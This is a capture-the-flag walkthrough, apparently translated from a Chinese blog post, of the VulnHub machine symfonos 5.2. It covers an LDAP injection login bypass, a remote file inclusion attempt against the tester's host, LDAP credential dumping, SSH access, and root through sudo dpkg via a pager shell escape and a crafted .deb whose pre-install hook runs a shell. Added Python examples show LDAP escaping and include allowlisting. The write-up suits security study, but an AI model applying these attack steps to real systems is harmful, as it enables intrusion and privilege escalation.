
【攻略鸭】symfonos 5.2 VulnHub Target Machine Walkthrough

2023-02-26 01:09 Author: 攻略鸭

The content of this article is purely fictional; 攻略鸭 asks for your follows and likes on Bilibili!

Target machine IP: 192.168.31.197

Testing machine IP: 192.168.31.38

External information gathering

Visiting http://192.168.31.197/ shows only an image.

Port scan

PORT    STATE SERVICE  REASON         VERSION
22/tcp  open  ssh      syn-ack ttl 64 OpenSSH 7.9p1 Debian 10+deb10u1 (protocol 2.0)
80/tcp  open  http     syn-ack ttl 63 Apache httpd 2.4.29 ((Ubuntu))
| http-methods:
|_  Supported Methods: HEAD GET POST OPTIONS
|_http-server-header: Apache/2.4.29 (Ubuntu)
389/tcp open  ldap     syn-ack ttl 63 OpenLDAP 2.2.X - 2.3.X
636/tcp open  ldapssl? syn-ack ttl 63
LDAP Results
|   <ROOT>
|       namingContexts: dc=symfonos,dc=local
|       supportedControl: 2.16.840.1.113730.3.4.18
...
|       supportedSASLMechanisms: GSSAPI
|       supportedSASLMechanisms: DIGEST-MD5
|       supportedSASLMechanisms: OTP
|       supportedSASLMechanisms: NTLM
|       supportedSASLMechanisms: CRAM-MD5
|_      subschemaSubentry: cn=Subschema

LDAP anonymous bind

$ ldapdomaindump 192.168.31.197

Failed.

Web directory enumeration

ffuf -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -u http://192.168.31.197/FUZZ -e .php,.txt -c
.php                    [Status: 403, Size: 279, Words: 20, Lines: 10, Duration: 2ms]
home.php                [Status: 302, Size: 979, Words: 117, Lines: 29, Duration: 2ms]
admin.php               [Status: 200, Size: 1650, Words: 707, Lines: 40, Duration: 1ms]
static                  [Status: 301, Size: 317, Words: 20, Lines: 10, Duration: 0ms]
logout.php              [Status: 302, Size: 0, Words: 1, Lines: 1, Duration: 0ms]
portraits.php           [Status: 200, Size: 165, Words: 10, Lines: 4, Duration: 13ms]
server-status           [Status: 403, Size: 279, Words: 20, Lines: 10, Duration: 0ms]


Visiting http://192.168.31.197/admin.php shows a login page.

Trying SQLi

GET /admin.php?username=admin%27or%271&password=asfd

Unsuccessful.


Identifying vulnerability test points

(1) Sensitive information disclosure

GET /home.php

Response:

HTTP/1.1 302 Found

The response body contains http://127.0.0.1/home.php?url=http://127.0.0.1/portraits.php

(2) LDAP injection

Since an LDAP service is present, try LDAP injection.

GET /admin.php?username=*&password=*
Login succeeds.
The page http://127.0.0.1/home.php?url=http://127.0.0.1/portraits.php is revealed.
Change the URL to http://192.168.31.197/home.php?url=http://127.0.0.1/portraits.php


Testing for file inclusion

Trying RFI

http://192.168.31.197/home.php?url=http://192.168.31.38:8088/reverse.php

The included PHP file is fetched but not parsed (executed).


GET /home.php?url=http://127.0.0.1/admin.php

The page content is displayed, but without the PHP source.

Trying LFI

GET /home.php?url=admin.php

In the response:

$ldap_ch = ldap_connect("ldap://172.18.0.22");
$bind = ldap_bind($ldap_ch, "cn=admin,dc=symfonos,dc=local", "qMDdyZh3cT6eeAWD");
$filter = "(&(uid=$username)(userPassword=$password))";
$result = ldap_search($ldap_ch, "dc=symfonos,dc=local", $filter);
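Why username=*&password=* logs in, and the fix: the admin.php snippet above interpolates both inputs straight into the search filter. The following is an added Python example (not the symfonos PHP) that reproduces the vulnerable filter build beside a hardened one using RFC 4515 escaping, the equivalent of wrapping each input in PHP's ldap_escape($v, '', LDAP_ESCAPE_FILTER); it runs offline and contacts no directory.

```python
"""Added example (Python, not the symfonos PHP): why username=*&password=*
logs in, and the RFC 4515 escaping that stops it. Equivalent to wrapping
each input in PHP ldap_escape($v, '', LDAP_ESCAPE_FILTER). Offline; no
directory is contacted."""

# RFC 4515: these characters must be written as \XX hex escapes in a filter
_FILTER_ESCAPES = {"\\": r"\5c", "*": r"\2a", "(": r"\28",
                   ")": r"\29", "\x00": r"\00"}

def ldap_escape_filter(value: str) -> str:
    """Escape one assertion value for use inside an LDAP search filter."""
    return "".join(_FILTER_ESCAPES.get(ch, ch) for ch in value)

def build_filter_unsafe(username: str, password: str) -> str:
    """Mirrors the vulnerable admin.php: raw interpolation of both inputs.
    '*' survives as a wildcard, so (&(uid=*)(userPassword=*)) matches every
    entry carrying both attributes and the login check passes."""
    return f"(&(uid={username})(userPassword={password}))"

def build_filter_safe(username: str, password: str) -> str:
    """Hardened build: every metacharacter becomes a literal. A '*' can no
    longer act as a wildcard and a ')' cannot close the assertion early.
    (Better still: search by uid only, then ldap_bind() as the user's DN
    instead of comparing userPassword inside a filter.)"""
    return (f"(&(uid={ldap_escape_filter(username)})"
            f"(userPassword={ldap_escape_filter(password)}))")

def unescaped_wildcards(ldap_filter: str) -> int:
    """Detection aid for application logs that record outgoing filters built
    from user input: counts raw '*' characters, which never appear in a
    properly escaped value (they would have become \\2a)."""
    return ldap_filter.count("*")
```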
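The url= parameter of home.php accepted a loopback URL, a remote host and a bare local filename in the tests above. As an added Python example (not the symfonos code), here is the defensive alternative: map the parameter onto an allowlist of local page names and reject everything else, plus a small detector that runs over constructed access-log lines modelled on the requests in this walkthrough. The allowlist contents and the log format are assumptions.

```python
"""Added example (Python, not the symfonos PHP): hardened handling of a
home.php?url=... parameter. Instead of fetching or including whatever the
parameter names, the value is mapped onto an allowlist of local pages.
The allowlist contents and the log format are assumptions."""
import re
from pathlib import PurePosixPath
from typing import List, Optional
from urllib.parse import parse_qs, urlsplit

# Assumed allowlist: the only page names home.php may include.
ALLOWED_PAGES = {"portraits.php": "portraits.php"}

def resolve_include(url_param: str) -> Optional[str]:
    """Return the local file to include for a url= value, or None to reject.
    Only a bare, allowlisted page name passes: absolute URLs (loopback or
    remote hosts), other schemes such as file: or php:, and any path with
    directory components (../, /etc/...) are all refused."""
    parts = urlsplit(url_param)
    if parts.scheme or parts.netloc:
        return None
    name = PurePosixPath(parts.path).name
    if name != parts.path:          # path carried directory components
        return None
    return ALLOWED_PAGES.get(name)

# Constructed access-log lines modelled on the requests in the walkthrough.
SAMPLE_LOG = """\
192.168.31.38 - - [26/Feb/2023:01:09:00 +0800] "GET /home.php?url=http://127.0.0.1/portraits.php HTTP/1.1" 200 979
192.168.31.38 - - [26/Feb/2023:01:09:05 +0800] "GET /home.php?url=http://192.168.31.38:8088/reverse.php HTTP/1.1" 200 120
192.168.31.38 - - [26/Feb/2023:01:09:09 +0800] "GET /home.php?url=admin.php HTTP/1.1" 200 1650
192.168.31.38 - - [26/Feb/2023:01:09:12 +0800] "GET /home.php?url=portraits.php HTTP/1.1" 200 165
"""

REQ_RE = re.compile(r'"GET (/home\.php\?[^ "]*) HTTP/')

def flag_suspicious(log_text: str) -> List[str]:
    """Detection aid: url= values in home.php requests that the resolver
    would reject, i.e. attempts to pull remote, loopback or off-list files."""
    hits = []
    for line in log_text.splitlines():
        m = REQ_RE.search(line)
        if not m:
            continue
        for value in parse_qs(urlsplit(m.group(1)).query).get("url", []):
            if resolve_include(value) is None:
                hits.append(value)
    return hits
```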


Accessing LDAP

Via JXplorer

DN: cn=admin,dc=symfonos,dc=local

Password: qMDdyZh3cT6eeAWD

Via ldapsearch

$ ldapsearch -x -H ldap://192.168.31.197 -D 'cn=admin,dc=symfonos,dc=local' -w qMDdyZh3cT6eeAWD -b 'dc=symfonos,dc=local'
# symfonos.local
dn: dc=symfonos,dc=local
objectClass: top
objectClass: dcObject
objectClass: organization
o: symfonos
dc: symfonos

# admin, symfonos.local
dn: cn=admin,dc=symfonos,dc=local
objectClass: simpleSecurityObject
objectClass: organizationalRole
cn: admin
description: LDAP administrator
userPassword:: e1NTSEF9VVdZeHZ1aEEwYldzamZyMmJodHhRYmFwcjllU2dLVm0=

# zeus, symfonos.local
dn: uid=zeus,dc=symfonos,dc=local
uid: zeus
cn: zeus
sn: 3
objectClass: top
objectClass: posixAccount
objectClass: inetOrgPerson
loginShell: /bin/bash
homeDirectory: /home/zeus
uidNumber: 14583102
gidNumber: 14564100
userPassword:: Y2V0a0tmNHdDdUhDOUZFVA==
mail: zeus@symfonos.local
gecos: Zeus User


After logging in we get:

cn admin
userPassword:
{SSHA}UWYxvuhA0bWsjfr2bhtxQbapr9eSgKVm

cn:zeus
gecos:Zeus User
gidNumber:14564100
homeDirectory:/home/zeus
loginShell:/bin/bash
mail:zeus@symfonos.local
objectClass:
top
posixAccount
inetOrgPerson
sn:3
uid:zeus
uidNumber:14583102
userPassword:cetkKf4wCuHC9FET


Try SSH with the username and password obtained

ssh zeus@192.168.31.197
zeus@symfonos5:~$ id
uid=1000(zeus) gid=1000(zeus) groups=1000(zeus),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),109(netdev)


Privilege escalation via sudo

$ sudo -l
Matching Defaults entries for zeus on symfonos5:
  env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User zeus may run the following commands on symfonos5:
  (root) NOPASSWD: /usr/bin/dpkg


Method 1

$ sudo dpkg -l
ii  cpio              2.12+dfsg-9         amd64     GNU cpio -- a program to manage archives of files
ii  cpp              4:8.3.0-1          amd64     GNU C preprocessor (cpp)
ii  cpp-8             8.3.0-6           amd64     GNU C preprocessor
ii  cron              3.0pl1-134+deb10u1      amd64     process scheduling daemon
While the listing is shown in the pager, type at the bottom:
!/bin/sh
# id
uid=0(root) gid=0(root) groups=0(root)


Method 2

fpm needs rubygems and friends; on Debian-based systems install:
sudo apt-get install ruby ruby-dev rubygems build-essential
sudo gem install --no-document fpm
fpm --version

touch exp.sh
echo 'exec /bin/sh' > exp.sh
fpm -n x -s dir -t deb -a all --before-install exp.sh .
ls -al
-rw-r--r--  1 kali kali 8341274 Feb 21 04:38 x_1.0_all.deb
Upload the package to the target machine:
$ sudo dpkg -i x_1.0_all.deb
Selecting previously unselected package x.
(Reading database ... 53057 files and directories currently installed.)
Preparing to unpack x_1.0_all.deb ...
# id
uid=0(root) gid=0(root) groups=0(root)


Other

Flag

# cat /root/proof.txt
Congrats on rooting symfonos:5!


Target machine issues

When fuzzing LDAP and LFI it did not work at first; the error "Wrong scheme! You can only use http or https!" was very convincing, and I thought it was filtering. Only after re-importing the virtual machine did it work.
